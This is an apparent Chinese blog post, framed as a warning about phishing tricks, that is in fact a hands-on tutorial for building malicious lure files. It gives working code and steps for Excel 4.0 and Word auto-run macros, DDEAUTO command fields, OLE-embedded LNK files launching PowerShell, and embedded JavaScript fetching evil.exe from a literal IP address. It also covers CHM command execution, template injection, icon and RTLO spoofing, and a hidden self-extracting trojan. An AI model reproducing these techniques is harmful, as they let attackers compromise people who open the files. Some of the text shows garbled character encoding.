OFFICE

【查看資料】

Office安全保護(hù)機(jī)制

受保護(hù)的視圖
為了保護(hù)計(jì)算機(jī)不受office病毒侵害，微軟設(shè)計(jì)了一個(gè)收保護(hù)視圖，將所有可疑的office文件以只讀方式打開(kāi)，在該模式下多數(shù)編輯功能被禁用。文件唄以受保護(hù)視圖打開(kāi)的情況有如下幾種

文件是從 Internet 位置打開(kāi)的 文件是通過(guò) Outlook 附件的方式接收的，并且計(jì)算機(jī)策略將發(fā)件人定義為不安全 文件是從不安全的位置打開(kāi)的 文件被文件塊阻止 文件驗(yàn)證失敗 文件是使用“在受保護(hù)的視圖中打開(kāi)”選項(xiàng)打開(kāi)的 文件是從其他人的 OneDrive 存儲(chǔ)中打開(kāi)的

【查看資料】

XLM / Macro 4.0 （excel宏釣魚(yú)）
excel下有宏功能，可以用來(lái)執(zhí)行命令。
其使用方法如下

右鍵下方sheet1，選擇插入

點(diǎn)擊 MS Excel4.0宏表，就可在excel中插入一個(gè)宏表
依次輸入這兩個(gè)命令，并把第一行設(shè)置為Auto_Open

隨后保存為xlsm文件即可。隨后當(dāng)該文件被打開(kāi)時(shí)，會(huì)自動(dòng)打開(kāi)cmd窗口

這里的exec其實(shí)是執(zhí)行的cmd命令，我們可以借此來(lái)上線cs等操作。

真不錯(cuò)。但在某些情況下打開(kāi)此類(lèi)excel文件需手動(dòng)點(diǎn)擊啟用宏才能正常釣魚(yú)。

Word宏

新建一個(gè)word文件，進(jìn)入宏選項(xiàng)（如果沒(méi)有請(qǐng)自行在開(kāi)發(fā)者工具里開(kāi)啟

然后隨便輸AutoOpen(文件打開(kāi)時(shí)自動(dòng)執(zhí)行宏)，創(chuàng)建，注意宏的位置要指定為當(dāng)前文檔

然后進(jìn)入宏編輯框

輸入以下命令

Sub AutoOpen() Shell ("calc") //只需要寫(xiě)這個(gè)就行了 End Sub

AutoExec：啟動(dòng) Word 或加載全局模板時(shí)
AutoNew：每次新建文檔時(shí)
AutoOpen：每次打開(kāi)已有文檔時(shí)
AutoClose：每次關(guān)閉文檔時(shí)
AutoExit：退出 Word 或卸載全局模板時(shí)

保存為docm（啟用宏的word文檔）

打開(kāi)文件，就蹦出計(jì)算器了。（前提是在信任中心設(shè)置開(kāi)啟所有宏）
當(dāng)然，一般情況下打開(kāi)此類(lèi)文件會(huì)顯示

啟用內(nèi)容后就會(huì)彈計(jì)算器了

Word DDE

在word文件里，輸入 ctrl+F9,進(jìn)入到域代碼編輯。我們可以鍵入以下代碼使文件在被打開(kāi)時(shí)執(zhí)行系統(tǒng)命令（word2019復(fù)現(xiàn)未成功，word2016成功，似乎是word版本問(wèn)題
這個(gè)蠻實(shí)用的，目前眾多word是默認(rèn)禁用宏的，dde只需要用戶(hù)點(diǎn)擊兩個(gè)按鈕即可執(zhí)行，實(shí)用性比宏好

DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"

隨后在打開(kāi)該文件時(shí)會(huì)出現(xiàn)兩個(gè)對(duì)話(huà)框，全點(diǎn)是就會(huì)執(zhí)行以上命令了

office OLE+LNK

核心目標(biāo)是創(chuàng)建一個(gè)內(nèi)嵌的lnk文件誘導(dǎo)用戶(hù)點(diǎn)擊，從而執(zhí)行命令。word，excel都能使用

我們創(chuàng)建一個(gè)快捷方式如下

其目標(biāo)處填寫(xiě)的是

%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe -command calc

然后打開(kāi)word文件，插入對(duì)象，選擇package，為了更加逼真勾選顯示為圖標(biāo)，然后可以更改圖標(biāo)，我們?cè)诟膱D標(biāo)處選擇一個(gè)迷惑性比較大的圖標(biāo)

然后進(jìn)入創(chuàng)建軟件包界面，選擇我們剛剛創(chuàng)建的lnk文件，寫(xiě)好卷標(biāo)名，然后就把軟件包插入到word界面了，只要用戶(hù)點(diǎn)擊該軟件包并選擇執(zhí)行，則會(huì)執(zhí)行我們?cè)趌nk中定義的代碼

而且值得一提的是，如果用上述方法把lnk文件放入publisher文件，則在網(wǎng)絡(luò)中打開(kāi)該文件時(shí)不會(huì)觸發(fā)受保護(hù)視圖。（可能是我本地環(huán)境有點(diǎn)錯(cuò)？我覺(jué)得這個(gè)有點(diǎn)離譜

嵌入js元素

這個(gè)說(shuō)實(shí)話(huà)需要一點(diǎn)js功底。。
這個(gè)方式的原理是，如果我們往word中插入聯(lián)機(jī)視頻，那么再word的壓縮包 word/document.xml里的embeddedHtml項(xiàng)中會(huì)出現(xiàn)聯(lián)機(jī)視頻對(duì)應(yīng)的內(nèi)嵌html代碼，我們可以通過(guò)修改這些代碼，插入惡意js代碼。

一般的利用方式是通過(guò)js下載惡意文件，但是似乎是因?yàn)閣ord的一些保護(hù)機(jī)制，不能實(shí)現(xiàn)頁(yè)面跳轉(zhuǎn)或者自動(dòng)點(diǎn)擊下載等操作(打開(kāi)word文件會(huì)報(bào)錯(cuò)),好迷

<html> <body> <script>var a = document.createElement('a');console.log(a);document.body.appendChild(a);a.style = 'display: none';a.href = "http://149.129.64.180/evil.exe"; //該行若存在，打開(kāi)word文件會(huì)報(bào)錯(cuò)a.download = fileName;window.URL.revokeObjectURL(url); </script> <script>a.click(); </script> </body> </html>

我看了一個(gè)POC，里面是通過(guò)構(gòu)造二進(jìn)制數(shù)據(jù)交給BLOB對(duì)象處理，并自動(dòng)點(diǎn)擊由BLOB對(duì)象生成的url實(shí)現(xiàn)下載二進(jìn)制數(shù)據(jù)，而這些二進(jìn)制數(shù)據(jù)實(shí)質(zhì)上是惡意文件。

因?yàn)槲腋悴粊?lái)那個(gè)二進(jìn)制數(shù)據(jù)怎么產(chǎn)生，所以這個(gè)方法暫時(shí)只做了解吧。。
而且我看的那個(gè)文章的POC在我的word2016里不能正常工作，不知道是什么原因

利用模板文件注入宏指令

原理是，先創(chuàng)建一個(gè)帶模板的文檔，再創(chuàng)一個(gè)啟用宏的模板文件。然后在帶模板的文檔的壓縮包里面修改一些內(nèi)容，使其指向的模板修改為我們自己創(chuàng)建的模板文件，這之間的過(guò)程可以由smb協(xié)議完成，故過(guò)查殺幾率較高。
【網(wǎng)絡(luò)安全學(xué)習(xí)資料·攻略】
我們?cè)趩⒂煤甑哪０逦募?#xff08;doc3.dotm)里寫(xiě)入宏。

Sub AutoOpen() Shell "calc" End Sub

CHM 電子書(shū)

新建一個(gè)html文件，編碼格式ANSI，向里面寫(xiě)入如下內(nèi)容

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body> command exec <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1> <PARAM name="Command" value="ShortCut"><PARAM name="Button" value="Bitmap::shortcut"><PARAM name="Item1" value=',cmd.exe,/c calc.exe'> //這一排用于執(zhí)行命令，注意cmd.exe前后都有,或者<PARAM name="Item1" value=',powershell.exe,-c calc.exe'>也行<PARAM name="Item2" value="273,1,1"> </OBJECT> <SCRIPT> x.Click(); </SCRIPT> </body></html>

用easychm，新建-瀏覽-選擇html文件所在目錄-選擇html文件-編譯

生成一個(gè)chm，雙擊，打開(kāi)了計(jì)算器

圖標(biāo)替換

【網(wǎng)絡(luò)安全學(xué)習(xí)資料·攻略】
使用Restorator，打開(kāi)需要替換圖標(biāo)的exe，提供圖標(biāo)的exe，如下

右鍵main.exe,添加資源，圖標(biāo)，id選擇127.
隨后右鍵Listary.exe/圖標(biāo)/127 導(dǎo)出，將其導(dǎo)出到一個(gè)文件夾
然后右鍵main.exe/圖標(biāo)，導(dǎo)入，選擇剛剛導(dǎo)出圖標(biāo)的文件夾，確定,ctrl+保存

RTLO

繼續(xù)重命名，在a后面右鍵，插入U(xiǎn)nicode控制字符->RLO

rar解壓自運(yùn)行

木馬文件:artifact.exe 迷惑文件:calc.exe
進(jìn)入winrar，選中這兩個(gè)文件，右鍵添加至壓縮包.創(chuàng)建自解壓格式壓縮文件

高級(jí)->自解壓選項(xiàng)->設(shè)置

模式->全部隱藏

更新->解壓并更新文件,覆蓋所有文件

生成,雙擊運(yùn)行

最后
關(guān)注我，持續(xù)更新網(wǎng)絡(luò)安全文章，私我獲取【網(wǎng)絡(luò)安全學(xué)習(xí)資料·攻略】

總結(jié)

以上是生活随笔為你收集整理的常见的钓鱼招式，可千万别入坑哦的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。